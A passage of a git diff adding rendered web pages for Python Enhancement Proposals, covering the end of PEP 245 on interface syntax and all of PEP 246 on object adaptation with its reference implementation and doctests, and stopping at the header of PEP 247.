This code, when evaluated, will create two interfaces called +CountFishInterface and ColorFishInterface. These interfaces +are defined by the interface statement.

+

The prose documentation for the interfaces and their methods come +from doc strings. The method signature information comes from the +signatures of the def statements. Notice how there is no body +for the def statements. The interface does not implement a +service to anything; it merely describes one. Documentation +strings on interfaces and interface methods are mandatory, a +‘pass’ statement cannot be provided. The interface equivalent of +a pass statement is an empty doc string.

+

You can also create interfaces that “extend” other interfaces. +Here, you can see a new type of Interface that extends the +CountFishInterface and ColorFishInterface:

+
interface FishMarketInterface(CountFishInterface, ColorFishInterface):
+    "This is the documentation for the FishMarketInterface"
+
+    def getFishMonger():
+        "Returns the fish monger you can interact with"
+
+    def hireNewFishMonger(name):
+        "Hire a new fish monger"
+
+    def buySomeFish(quantity=1):
+        "Buy some fish at the market"
+
+
+

The FishMarketInterface extends upon the CountFishInterface and +ColorfishInterface.

+
+
+

Interface Assertion

+

The next step is to put classes and interfaces together by +creating a concrete Python class that asserts that it implements +an interface. Here is an example FishMarket component that might +do this:

+
class FishError(Error):
+    pass
+
+class FishMarket implements FishMarketInterface:
+    number = 0
+    color = None
+    monger_name = 'Crusty Barnacles'
+
+    def __init__(self, number, color):
+        self.number = number
+        self.color = color
+
+    def oneFish(self):
+        self.number += 1
+
+    def twoFish(self):
+        self.number += 2
+
+    def redFish(self):
+        self.color = 'red'
+
+    def blueFish(self):
+        self.color = 'blue'
+
+    def getFishCount(self):
+        return self.number
+
+    def getFishColor(self):
+        return self.color
+
+    def getFishMonger(self):
+        return self.monger_name
+
+    def hireNewFishMonger(self, name):
+        self.monger_name = name
+
+    def buySomeFish(self, quantity=1):
+        if quantity > self.count:
+            raise FishError("There's not enough fish")
+        self.count -= quantity
+        return quantity
+
+
+

This new class, FishMarket defines a concrete class which +implements the FishMarketInterface. The object following the +implements statement is called an “interface assertion”. An +interface assertion can be either an interface object, or tuple of +interface assertions.

+

The interface assertion provided in a class statement like this +is stored in the class’s __implements__ class attribute. After +interpreting the above example, you would have a class statement +that can be examined like this with an ‘implements’ built-in +function:

+
>>> FishMarket
+<class FishMarket at 8140f50>
+>>> FishMarket.__implements__
+(<Interface FishMarketInterface at 81006f0>,)
+>>> f = FishMarket(6, 'red')
+>>> implements(f, FishMarketInterface)
+1
+>>>
+
+
+

A class can realize more than one interface. For example, say you +had an interface called ItemInterface that described how an +object worked as an item in a container object. If you wanted to +assert that FishMarket instances realized the ItemInterface +interface as well as the FishMarketInterface, you can provide an +interface assertion that contained a tuple of interface objects to +the FishMarket class:

+
class FishMarket implements FishMarketInterface, ItemInterface:
+    # ...
+
+
+

Interface assertions can also be used if you want to assert that +one class implements an interface, and all of the interfaces that +another class implements:

+
class MyFishMarket implements FishMarketInterface, ItemInterface:
+    # ...
+
+class YourFishMarket implements FooInterface, MyFishMarket.__implements__:
+    # ...
+
+
+

This new class YourFishMarket, asserts that it implements the +FooInterface, as well as the interfaces implemented by the +MyFishMarket class.

+

It’s worth going into a little bit more detail about interface +assertions. An interface assertion is either an interface object, +or a tuple of interface assertions. For example:

+
FooInterface
+
+FooInterface, (BarInterface, BobInterface)
+
+FooInterface, (BarInterface, (BobInterface, MyClass.__implements__))
+
+
+

Are all valid interface assertions. When two interfaces define +the same attributes, the order in which information is preferred +in the assertion is from top-to-bottom, left-to-right.

+

There are other interface proposals that, in the need for +simplicity, have combined the notion of class and interface to +provide simple interface enforcement. Interface objects have a +deferred method that returns a deferred class that implements +this behavior:

+
>>> FM = FishMarketInterface.deferred()
+>>> class MyFM(FM): pass
+
+>>> f = MyFM()
+>>> f.getFishMonger()
+Traceback (innermost last):
+  File "<stdin>", line 1, in ?
+Interface.Exceptions.BrokenImplementation:
+An object has failed to implement interface FishMarketInterface
+
+        The getFishMonger attribute was not provided.
+>>>
+
+
+

This provides for a bit of passive interface enforcement by +telling you what you forgot to do to implement that interface.

+
+
+

Formal Interface Syntax

+

Python syntax is defined in a modified BNF grammar notation +described in the Python Reference Manual [4]. This section +describes the proposed interface syntax using this grammar:

+
interfacedef:   "interface" interfacename [extends] ":" suite
+extends:        "(" [expression_list] ")"
+interfacename:  identifier
+
+
+

An interface definition is an executable statement. It first +evaluates the extends list, if present. Each item in the extends +list should evaluate to an interface object.

+

The interface’s suite is then executed in a new execution frame +(see the Python Reference Manual, section 4.1), using a newly +created local namespace and the original global namespace. When +the interface’s suite finishes execution, its execution frame is +discarded but its local namespace is saved as interface elements. +An interface object is then created using the extends list for the +base interfaces and the saved interface elements. The interface +name is bound to this interface object in the original local +namespace.

+

This PEP also proposes an extension to Python’s ‘class’ statement:

+
classdef:    "class" classname [inheritance] [implements] ":" suite
+implements:  "implements" implist
+implist:     expression-list
+
+classname,
+inheritance,
+suite,
+expression-list:  see the Python Reference Manual
+
+
+

Before a class’ suite is executed, the ‘inheritance’ and +‘implements’ statements are evaluated, if present. The +‘inheritance’ behavior is unchanged as defined in Section 7.6 of +the Language Reference.

+

The ‘implements’, if present, is evaluated after inheritance. +This must evaluate to an interface specification, which is either +an interface, or a tuple of interface specifications. If a valid +interface specification is present, the assertion is assigned to +the class object’s ‘__implements__’ attribute, as a tuple.

+

This PEP does not propose any changes to the syntax of function +definitions or assignments.

+
+
+

Classes and Interfaces

+

The example interfaces above do not describe any kind of behavior +for their methods, they just describe an interface that a typical +FishMarket object would realize.

+

You may notice a similarity between interfaces extending from +other interfaces and classes sub-classing from other classes. +This is a similar concept. However it is important to note that +interfaces extend interfaces and classes subclass classes. You +cannot extend a class or subclass an interface. Classes and +interfaces are separate.

+

The purpose of a class is to share the implementation of how an +object works. The purpose of an interface is to document how to +work with an object, not how the object is implemented. It is +possible to have several different classes with very different +implementations realize the same interface.

+

It’s also possible to implement one interface with many classes +that mix in pieces the functionality of the interface or, +conversely, it’s possible to have one class implement many +interfaces. Because of this, interfaces and classes should not be +confused or intermingled.

+
+
+

Interface-aware built-ins

+

A useful extension to Python’s list of built-in functions in the +light of interface objects would be implements(). This builtin +would expect two arguments, an object and an interface, and return +a true value if the object implements the interface, false +otherwise. For example:

+
>>> interface FooInterface: pass
+>>> class Foo implements FooInterface: pass
+>>> f = Foo()
+>>> implements(f, FooInterface)
+1
+
+
+

Currently, this functionality exists in the reference +implementation as functions in the Interface package, requiring +an “import Interface” to use it. Its existence as a built-in +would be purely for a convenience, and not necessary for using +interfaces, and analogous to isinstance() for classes.

+
+
+

Backward Compatibility

+

The proposed interface model does not introduce any backward +compatibility issues in Python. The proposed syntax, however, +does.

+

Any existing code that uses interface as an identifier will +break. There may be other kinds of backwards incompatibility that +defining interface as a new keyword will introduce. This +extension to Python’s syntax does not change any existing syntax +in any backward incompatible way.

+

The new from __future__ Python syntax (PEP 236), and the new warning +framework (PEP 230) is ideal for resolving this backward +incompatibility. To use interface syntax now, a developer could +use the statement:

+
from __future__ import interfaces
+
+
+

In addition, any code that uses the keyword interface as an +identifier will be issued a warning from Python. After the +appropriate period of time, the interface syntax would become +standard, the above import statement would do nothing, and any +identifiers named interface would raise an exception. This +period of time is proposed to be 24 months.

+
+
+

Summary of Proposed Changes to Python

+

Adding new interface keyword and extending class syntax with +implements.

+

Extending class interface to include __implements__.

+

Add ‘implements(obj, interface)’ built-in.

+
+
+

Risks

+

This PEP proposes adding one new keyword to the Python language, +interface. This will break code.

+
+
+

Open Issues

+
+

Goals

+
+
+

Syntax

+
+
+

Architecture

+
+
+
+

Dissenting Opinion

+

This PEP has not yet been discussed on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0245.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0246/index.html b/pep-0246/index.html new file mode 100644 index 00000000000..d9d3269099d --- /dev/null +++ b/pep-0246/index.html @@ -0,0 +1,820 @@ + + + + + + + + PEP 246 – Object Adaptation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 246 – Object Adaptation

+
+
Author:
+
Alex Martelli <aleaxit at gmail.com>, +Clark C. Evans <cce at clarkevans.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
21-Mar-2001
+
Python-Version:
+
2.5
+
Post-History:
+
29-Mar-2001, 10-Jan-2005
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

I’m rejecting this PEP. Something much better is about to happen; +it’s too early to say exactly what, but it’s not going to resemble +the proposal in this PEP too closely so it’s better to start a new +PEP. GvR.

+
+
+

Abstract

+

This proposal puts forth an extensible cooperative mechanism for +the adaptation of an incoming object to a context which expects an +object supporting a specific protocol (say a specific type, class, +or interface).

+

This proposal provides a built-in “adapt” function that, for any +object X and any protocol Y, can be used to ask the Python +environment for a version of X compliant with Y. Behind the +scenes, the mechanism asks object X: “Are you now, or do you know +how to wrap yourself to provide, a supporter of protocol Y?”. +And, if this request fails, the function then asks protocol Y: +“Does object X support you, or do you know how to wrap it to +obtain such a supporter?” This duality is important, because +protocols can be developed after objects are, or vice-versa, and +this PEP lets either case be supported non-invasively with regard +to the pre-existing component[s].

+

Lastly, if neither the object nor the protocol know about each +other, the mechanism may check a registry of adapter factories, +where callables able to adapt certain objects to certain protocols +can be registered dynamically. This part of the proposal is +optional: the same effect could be obtained by ensuring that +certain kinds of protocols and/or objects can accept dynamic +registration of adapter factories, for example via suitable custom +metaclasses. However, this optional part allows adaptation to be +made more flexible and powerful in a way that is not invasive to +either protocols or other objects, thereby gaining for adaptation +much the same kind of advantage that Python standard library’s +“copy_reg” module offers for serialization and persistence.

+

This proposal does not specifically constrain what a protocol +is, what “compliance to a protocol” exactly means, nor what +precisely a wrapper is supposed to do. These omissions are +intended to leave this proposal compatible with both existing +categories of protocols, such as the existing system of type and +classes, as well as the many concepts for “interfaces” as such +which have been proposed or implemented for Python, such as the +one in PEP 245, the one in Zope3 [2], or the ones discussed in +the BDFL’s Artima blog in late 2004 and early 2005 [3]. However, +some reflections on these subjects, intended to be suggestive and +not normative, are also included.

+
+
+

Motivation

+

Currently there is no standardized mechanism in Python for +checking if an object supports a particular protocol. Typically, +existence of certain methods, particularly special methods such as +__getitem__, is used as an indicator of support for a particular +protocol. This technique works well for a few specific protocols +blessed by the BDFL (Benevolent Dictator for Life). The same can +be said for the alternative technique based on checking +‘isinstance’ (the built-in class “basestring” exists specifically +to let you use ‘isinstance’ to check if an object “is a [built-in] +string”). Neither approach is easily and generally extensible to +other protocols, defined by applications and third party +frameworks, outside of the standard Python core.

+

Even more important than checking if an object already supports a +given protocol can be the task of obtaining a suitable adapter +(wrapper or proxy) for the object, if the support is not already +there. For example, a string does not support the file protocol, +but you can wrap it into a StringIO instance to obtain an object +which does support that protocol and gets its data from the string +it wraps; that way, you can pass the string (suitably wrapped) to +subsystems which require as their arguments objects that are +readable as files. Unfortunately, there is currently no general, +standardized way to automate this extremely important kind of +“adaptation by wrapping” operations.

+

Typically, today, when you pass objects to a context expecting a +particular protocol, either the object knows about the context and +provides its own wrapper or the context knows about the object and +wraps it appropriately. The difficulty with these approaches is +that such adaptations are one-offs, are not centralized in a +single place of the users code, and are not executed with a common +technique, etc. This lack of standardization increases code +duplication with the same adapter occurring in more than one place +or it encourages classes to be re-written instead of adapted. In +either case, maintainability suffers.

+

It would be very nice to have a standard function that can be +called upon to verify an object’s compliance with a particular +protocol and provide for a wrapper if one is readily available – +all without having to hunt through each library’s documentation +for the incantation appropriate to that particular, specific case.

+
+
+

Requirements

+

When considering an object’s compliance with a protocol, there are +several cases to be examined:

+
    +
  1. When the protocol is a type or class, and the object has +exactly that type or is an instance of exactly that class (not +a subclass). In this case, compliance is automatic.
  2. +
  3. When the object knows about the protocol, and either considers +itself compliant, or knows how to wrap itself suitably.
  4. +
  5. When the protocol knows about the object, and either the object +already complies or the protocol knows how to suitably wrap the +object.
  6. +
  7. When the protocol is a type or class, and the object is a +member of a subclass. This is distinct from the first case (a) +above, since inheritance (unfortunately) does not necessarily +imply substitutability, and thus must be handled carefully.
  8. +
  9. When the context knows about the object and the protocol and +knows how to adapt the object so that the required protocol is +satisfied. This could use an adapter registry or similar +approaches.
  10. +
+

The fourth case above is subtle. A break of substitutability can +occur when a subclass changes a method’s signature, or restricts +the domains accepted for a method’s argument (“co-variance” on +arguments types), or extends the co-domain to include return +values which the base class may never produce (“contra-variance” +on return types). While compliance based on class inheritance +should be automatic, this proposal allows an object to signal +that it is not compliant with a base class protocol.

+

If Python gains some standard “official” mechanism for interfaces, +however, then the “fast-path” case (a) can and should be extended +to the protocol being an interface, and the object an instance of +a type or class claiming compliance with that interface. For +example, if the “interface” keyword discussed in [3] is adopted +into Python, the “fast path” of case (a) could be used, since +instantiable classes implementing an interface would not be +allowed to break substitutability.

+
+
+

Specification

+

This proposal introduces a new built-in function, adapt(), which +is the basis for supporting these requirements.

+

The adapt() function has three parameters:

+
    +
  • obj, the object to be adapted
  • +
  • protocol, the protocol requested of the object
  • +
  • alternate, an optional object to return if the object could +not be adapted
  • +
+

A successful result of the adapt() function returns either the +object passed obj, if the object is already compliant with the +protocol, or a secondary object wrapper, which provides a view +of the object compliant with the protocol. The definition of +wrapper is deliberately vague, and a wrapper is allowed to be a +full object with its own state if necessary. However, the design +intention is that an adaptation wrapper should hold a reference to +the original object it wraps, plus (if needed) a minimum of extra +state which it cannot delegate to the wrapper object.

+

An excellent example of adaptation wrapper is an instance of +StringIO which adapts an incoming string to be read as if it was a +textfile: the wrapper holds a reference to the string, but deals +by itself with the “current point of reading” (from where in the +wrapped strings will the characters for the next, e.g., “readline” +call come from), because it cannot delegate it to the wrapped +object (a string has no concept of “current point of reading” nor +anything else even remotely related to that concept).

+

A failure to adapt the object to the protocol raises an +AdaptationError (which is a subclass of TypeError), unless the +alternate parameter is used, in this case the alternate argument +is returned instead.

+

To enable the first case listed in the requirements, the adapt() +function first checks to see if the object’s type or the object’s +class are identical to the protocol. If so, then the adapt() +function returns the object directly without further ado.

+

To enable the second case, when the object knows about the +protocol, the object must have a __conform__() method. This +optional method takes two arguments:

+
    +
  • self, the object being adapted
  • +
  • protocol, the protocol requested
  • +
+

Just like any other special method in today’s Python, __conform__ +is meant to be taken from the object’s class, not from the object +itself (for all objects, except instances of “classic classes” as +long as we must still support the latter). This enables a +possible ‘tp_conform’ slot to be added to Python’s type objects in +the future, if desired.

+

The object may return itself as the result of __conform__ to +indicate compliance. Alternatively, the object also has the +option of returning a wrapper object compliant with the protocol. +If the object knows it is not compliant although it belongs to a +type which is a subclass of the protocol, then __conform__ should +raise a LiskovViolation exception (a subclass of AdaptationError). +Finally, if the object cannot determine its compliance, it should +return None to enable the remaining mechanisms. If __conform__ +raises any other exception, “adapt” just propagates it.

+

To enable the third case, when the protocol knows about the +object, the protocol must have an __adapt__() method. This +optional method takes two arguments:

+
    +
  • self, the protocol requested
  • +
  • obj, the object being adapted
  • +
+

If the protocol finds the object to be compliant, it can return +obj directly. Alternatively, the method may return a wrapper +compliant with the protocol. If the protocol knows the object is +not compliant although it belongs to a type which is a subclass of +the protocol, then __adapt__ should raise a LiskovViolation +exception (a subclass of AdaptationError). Finally, when +compliance cannot be determined, this method should return None to +enable the remaining mechanisms. If __adapt__ raises any other +exception, “adapt” just propagates it.

+

The fourth case, when the object’s class is a sub-class of the +protocol, is handled by the built-in adapt() function. Under +normal circumstances, if “isinstance(object, protocol)” then +adapt() returns the object directly. However, if the object is +not substitutable, either the __conform__() or __adapt__() +methods, as above mentioned, may raise an LiskovViolation (a +subclass of AdaptationError) to prevent this default behavior.

+

If none of the first four mechanisms worked, as a last-ditch +attempt, ‘adapt’ falls back to checking a registry of adapter +factories, indexed by the protocol and the type of obj, to meet +the fifth case. Adapter factories may be dynamically registered +and removed from that registry to provide “third party adaptation” +of objects and protocols that have no knowledge of each other, in +a way that is not invasive to either the object or the protocols.

+
+
+

Intended Use

+

The typical intended use of adapt is in code which has received +some object X “from the outside”, either as an argument or as the +result of calling some function, and needs to use that object +according to a certain protocol Y. A “protocol” such as Y is +meant to indicate an interface, usually enriched with some +semantics constraints (such as are typically used in the “design +by contract” approach), and often also some pragmatical +expectation (such as “the running time of a certain operation +should be no worse than O(N)”, or the like); this proposal does +not specify how protocols are designed as such, nor how or whether +compliance to a protocol is checked, nor what the consequences may +be of claiming compliance but not actually delivering it (lack of +“syntactic” compliance – names and signatures of methods – will +often lead to exceptions being raised; lack of “semantic” +compliance may lead to subtle and perhaps occasional errors +[imagine a method claiming to be threadsafe but being in fact +subject to some subtle race condition, for example]; lack of +“pragmatic” compliance will generally lead to code that runs +correctly, but too slowly for practical use, or sometimes to +exhaustion of resources such as memory or disk space).

+

When protocol Y is a concrete type or class, compliance to it is +intended to mean that an object allows all of the operations that +could be performed on instances of Y, with “comparable” semantics +and pragmatics. For example, a hypothetical object X that is a +singly-linked list should not claim compliance with protocol +‘list’, even if it implements all of list’s methods: the fact that +indexing X[n] takes time O(n), while the same operation would be +O(1) on a list, makes a difference. On the other hand, an +instance of StringIO.StringIO does comply with protocol ‘file’, +even though some operations (such as those of module ‘marshal’) +may not allow substituting one for the other because they perform +explicit type-checks: such type-checks are “beyond the pale” from +the point of view of protocol compliance.

+

While this convention makes it feasible to use a concrete type or +class as a protocol for purposes of this proposal, such use will +often not be optimal. Rarely will the code calling ‘adapt’ need +ALL of the features of a certain concrete type, particularly for +such rich types as file, list, dict; rarely can all those features +be provided by a wrapper with good pragmatics, as well as syntax +and semantics that are really the same as a concrete type’s.

+

Rather, once this proposal is accepted, a design effort needs to +start to identify the essential characteristics of those protocols +which are currently used in Python, particularly within the +standard library, and to formalize them using some kind of +“interface” construct (not necessarily requiring any new syntax: a +simple custom metaclass would let us get started, and the results +of the effort could later be migrated to whatever “interface” +construct is eventually accepted into the Python language). With +such a palette of more formally designed protocols, the code using +‘adapt’ will be able to ask for, say, adaptation into “a filelike +object that is readable and seekable”, or whatever else it +specifically needs with some decent level of “granularity”, rather +than too-generically asking for compliance to the ‘file’ protocol.

+

Adaptation is NOT “casting”. When object X itself does not +conform to protocol Y, adapting X to Y means using some kind of +wrapper object Z, which holds a reference to X, and implements +whatever operation Y requires, mostly by delegating to X in +appropriate ways. For example, if X is a string and Y is ‘file’, +the proper way to adapt X to Y is to make a StringIO(X), NOT to +call file(X) [which would try to open a file named by X].

+

Numeric types and protocols may need to be an exception to this +“adaptation is not casting” mantra, however.

+
+
+

Guido’s “Optional Static Typing: Stop the Flames” Blog Entry

+

A typical simple use case of adaptation would be:

+
def f(X):
+    X = adapt(X, Y)
+    # continue by using X according to protocol Y
+
+
+

In [4], the BDFL has proposed introducing the syntax:

+
def f(X: Y):
+    # continue by using X according to protocol Y
+
+
+

to be a handy shortcut for exactly this typical use of adapt, and, +as a basis for experimentation until the parser has been modified +to accept this new syntax, a semantically equivalent decorator:

+
@arguments(Y)
+def f(X):
+    # continue by using X according to protocol Y
+
+
+

These BDFL ideas are fully compatible with this proposal, as are +other of Guido’s suggestions in the same blog.

+
+
+

Reference Implementation and Test Cases

+

The following reference implementation does not deal with classic +classes: it consider only new-style classes. If classic classes +need to be supported, the additions should be pretty clear, though +a bit messy (x.__class__ vs type(x), getting boundmethods directly +from the object rather than from the type, and so on).

+
-----------------------------------------------------------------
+adapt.py
+-----------------------------------------------------------------
+class AdaptationError(TypeError):
+    pass
+class LiskovViolation(AdaptationError):
+    pass
+
+_adapter_factory_registry = {}
+
+def registerAdapterFactory(objtype, protocol, factory):
+    _adapter_factory_registry[objtype, protocol] = factory
+
+def unregisterAdapterFactory(objtype, protocol):
+    del _adapter_factory_registry[objtype, protocol]
+
+def _adapt_by_registry(obj, protocol, alternate):
+    factory = _adapter_factory_registry.get((type(obj), protocol))
+    if factory is None:
+        adapter = alternate
+    else:
+        adapter = factory(obj, protocol, alternate)
+    if adapter is AdaptationError:
+        raise AdaptationError
+    else:
+        return adapter
+
+
+def adapt(obj, protocol, alternate=AdaptationError):
+
+    t = type(obj)
+
+    # (a) first check to see if object has the exact protocol
+    if t is protocol:
+       return obj
+
+    try:
+        # (b) next check if t.__conform__ exists & likes protocol
+        conform = getattr(t, '__conform__', None)
+        if conform is not None:
+            result = conform(obj, protocol)
+            if result is not None:
+                return result
+
+        # (c) then check if protocol.__adapt__ exists & likes obj
+        adapt = getattr(type(protocol), '__adapt__', None)
+        if adapt is not None:
+            result = adapt(protocol, obj)
+            if result is not None:
+                return result
+    except LiskovViolation:
+        pass
+    else:
+        # (d) check if object is instance of protocol
+        if isinstance(obj, protocol):
+            return obj
+
+    # (e) last chance: try the registry
+    return _adapt_by_registry(obj, protocol, alternate)
+
+-----------------------------------------------------------------
+test.py
+-----------------------------------------------------------------
+from adapt import AdaptationError, LiskovViolation, adapt
+from adapt import registerAdapterFactory, unregisterAdapterFactory
+import doctest
+
+class A(object):
+    '''
+    >>> a = A()
+    >>> a is adapt(a, A)   # case (a)
+    True
+    '''
+
+class B(A):
+    '''
+    >>> b = B()
+    >>> b is adapt(b, A)   # case (d)
+    True
+    '''
+
+class C(object):
+    '''
+    >>> c = C()
+    >>> c is adapt(c, B)   # case (b)
+    True
+    >>> c is adapt(c, A)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    def __conform__(self, protocol):
+        if protocol is B:
+            return self
+
+class D(C):
+    '''
+    >>> d = D()
+    >>> d is adapt(d, D)   # case (a)
+    True
+    >>> d is adapt(d, C)   # case (d) explicitly blocked
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    def __conform__(self, protocol):
+        if protocol is C:
+            raise LiskovViolation
+
+class MetaAdaptingProtocol(type):
+    def __adapt__(cls, obj):
+        return cls.adapt(obj)
+
+class AdaptingProtocol:
+    __metaclass__ = MetaAdaptingProtocol
+    @classmethod
+    def adapt(cls, obj):
+        pass
+
+class E(AdaptingProtocol):
+    '''
+    >>> a = A()
+    >>> a is adapt(a, E)   # case (c)
+    True
+    >>> b = A()
+    >>> b is adapt(b, E)   # case (c)
+    True
+    >>> c = C()
+    >>> c is adapt(c, E)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    @classmethod
+    def adapt(cls, obj):
+        if isinstance(obj, A):
+            return obj
+
+class F(object):
+    pass
+
+def adapt_F_to_A(obj, protocol, alternate):
+    if isinstance(obj, F) and issubclass(protocol, A):
+        return obj
+    else:
+        return alternate
+
+def test_registry():
+    '''
+    >>> f = F()
+    >>> f is adapt(f, A)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    >>> registerAdapterFactory(F, A, adapt_F_to_A)
+    >>> f is adapt(f, A)   # case (e)
+    True
+    >>> unregisterAdapterFactory(F, A)
+    >>> f is adapt(f, A)   # a failure case again
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    >>> registerAdapterFactory(F, A, adapt_F_to_A)
+    '''
+
+doctest.testmod()
+
+
+
+
+

Relationship To Microsoft’s QueryInterface

+

Although this proposal has some similarities to Microsoft’s (COM) +QueryInterface, it differs by a number of aspects.

+

First, adaptation in this proposal is bi-directional, allowing the +interface (protocol) to be queried as well, which gives more +dynamic abilities (more Pythonic). Second, there is no special +“IUnknown” interface which can be used to check or obtain the +original unwrapped object identity, although this could be +proposed as one of those “special” blessed interface protocol +identifiers. Third, with QueryInterface, once an object supports +a particular interface it must always there after support this +interface; this proposal makes no such guarantee, since, in +particular, adapter factories can be dynamically added to the +registried and removed again later.

+

Fourth, implementations of Microsoft’s QueryInterface must support +a kind of equivalence relation – they must be reflexive, +symmetrical, and transitive, in specific senses. The equivalent +conditions for protocol adaptation according to this proposal +would also represent desirable properties:

+
# given, to start with, a successful adaptation:
+X_as_Y = adapt(X, Y)
+
+# reflexive:
+assert adapt(X_as_Y, Y) is X_as_Y
+
+# transitive:
+X_as_Z = adapt(X, Z, None)
+X_as_Y_as_Z = adapt(X_as_Y, Z, None)
+assert (X_as_Y_as_Z is None) == (X_as_Z is None)
+
+# symmetrical:
+X_as_Z_as_Y = adapt(X_as_Z, Y, None)
+assert (X_as_Y_as_Z is None) == (X_as_Z_as_Y is None)
+
+
+

However, while these properties are desirable, it may not be +possible to guarantee them in all cases. QueryInterface can +impose their equivalents because it dictates, to some extent, how +objects, interfaces, and adapters are to be coded; this proposal +is meant to be not necessarily invasive, usable and to “retrofit” +adaptation between two frameworks coded in mutual ignorance of +each other without having to modify either framework.

+

Transitivity of adaptation is in fact somewhat controversial, as +is the relationship (if any) between adaptation and inheritance.

+

The latter would not be controversial if we knew that inheritance +always implies Liskov substitutability, which, unfortunately we +don’t. If some special form, such as the interfaces proposed in +[4], could indeed ensure Liskov substitutability, then for that +kind of inheritance, only, we could perhaps assert that if X +conforms to Y and Y inherits from Z then X conforms to Z… but +only if substitutability was taken in a very strong sense to +include semantics and pragmatics, which seems doubtful. (For what +it’s worth: in QueryInterface, inheritance does not require nor +imply conformance). This proposal does not include any “strong” +effects of inheritance, beyond the small ones specifically +detailed above.

+

Similarly, transitivity might imply multiple “internal” adaptation +passes to get the result of adapt(X, Z) via some intermediate Y, +intrinsically like adapt(adapt(X, Y), Z), for some suitable and +automatically chosen Y. Again, this may perhaps be feasible under +suitably strong constraints, but the practical implications of +such a scheme are still unclear to this proposal’s authors. Thus, +this proposal does not include any automatic or implicit +transitivity of adaptation, under whatever circumstances.

+

For an implementation of the original version of this proposal +which performs more advanced processing in terms of transitivity, +and of the effects of inheritance, see Phillip J. Eby’s +PyProtocols [5]. The documentation accompanying PyProtocols is +well worth studying for its considerations on how adapters should +be coded and used, and on how adaptation can remove any need for +typechecking in application code.

+
+
+

Questions and Answers

+
    +
  • Q: What benefit does this proposal provide?

    A: The typical Python programmer is an integrator, someone who is +connecting components from various suppliers. Often, to +interface between these components, one needs intermediate +adapters. Usually the burden falls upon the programmer to +study the interface exposed by one component and required by +another, determine if they are directly compatible, or develop +an adapter. Sometimes a supplier may even include the +appropriate adapter, but even then searching for the adapter +and figuring out how to deploy the adapter takes time.

    +

    This technique enables suppliers to work with each other +directly, by implementing __conform__ or __adapt__ as +necessary. This frees the integrator from making their own +adapters. In essence, this allows the components to have a +simple dialogue among themselves. The integrator simply +connects one component to another, and if the types don’t +automatically match an adapting mechanism is built-in.

    +

    Moreover, thanks to the adapter registry, a “fourth party” may +supply adapters to allow interoperation of frameworks which +are totally unaware of each other, non-invasively, and without +requiring the integrator to do anything more than install the +appropriate adapter factories in the registry at start-up.

    +

    As long as libraries and frameworks cooperate with the +adaptation infrastructure proposed here (essentially by +defining and using protocols appropriately, and calling +‘adapt’ as needed on arguments received and results of +call-back factory functions), the integrator’s work thereby +becomes much simpler.

    +

    For example, consider SAX1 and SAX2 interfaces: there is an +adapter required to switch between them. Normally, the +programmer must be aware of this; however, with this +adaptation proposal in place, this is no longer the case – +indeed, thanks to the adapter registry, this need may be +removed even if the framework supplying SAX1 and the one +requiring SAX2 are unaware of each other.

    +
  • +
  • Q: Why does this have to be built-in, can’t it be standalone?

    A: Yes, it does work standalone. However, if it is built-in, it +has a greater chance of usage. The value of this proposal is +primarily in standardization: having libraries and frameworks +coming from different suppliers, including the Python standard +library, use a single approach to adaptation. Furthermore:

    +
      +
    1. The mechanism is by its very nature a singleton.
    2. +
    3. If used frequently, it will be much faster as a built-in.
    4. +
    5. It is extensible and unassuming.
    6. +
    7. Once ‘adapt’ is built-in, it can support syntax extensions +and even be of some help to a type inference system.
    8. +
    +
  • +
  • Q: Why the verbs __conform__ and __adapt__?

    A: conform, verb intransitive

    +
      +
    1. To correspond in form or character; be similar.
    2. +
    3. To act or be in accord or agreement; comply.
    4. +
    5. To act in accordance with current customs or modes.
    6. +
    +

    adapt, verb transitive

    +
      +
    1. To make suitable to or fit for a specific use or situation.
    2. +
    +

    Source: The American Heritage Dictionary of the English +Language, Third Edition

    +
  • +
+
+
+

Backwards Compatibility

+

There should be no problem with backwards compatibility unless +someone had used the special names __conform__ or __adapt__ in +other ways, but this seems unlikely, and, in any case, user code +should never use special names for non-standard purposes.

+

This proposal could be implemented and tested without changes to +the interpreter.

+
+
+

Credits

+

This proposal was created in large part by the feedback of the +talented individuals on the main Python mailing lists and the +type-sig list. To name specific contributors (with apologies if +we missed anyone!), besides the proposal’s authors: the main +suggestions for the proposal’s first versions came from Paul +Prescod, with significant feedback from Robin Thomas, and we also +borrowed ideas from Marcin ‘Qrczak’ Kowalczyk and Carlos Ribeiro.

+

Other contributors (via comments) include Michel Pelletier, Jeremy +Hylton, Aahz Maruch, Fredrik Lundh, Rainer Deyke, Timothy Delaney, +and Huaiyu Zhu. The current version owes a lot to discussions +with (among others) Phillip J. Eby, Guido van Rossum, Bruce Eckel, +Jim Fulton, and Ka-Ping Yee, and to study and reflection of their +proposals, implementations, and documentation about use and +adaptation of interfaces and protocols in Python.

+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0246.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0247/index.html b/pep-0247/index.html new file mode 100644 index 00000000000..a5a7bca74b1 --- /dev/null +++ b/pep-0247/index.html @@ -0,0 +1,270 @@ + + + + + + + + PEP 247 – API for Cryptographic Hash Functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 247 – API for Cryptographic Hash Functions

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
23-Mar-2001
+
Post-History:
+
20-Sep-2001
+
+
+
+
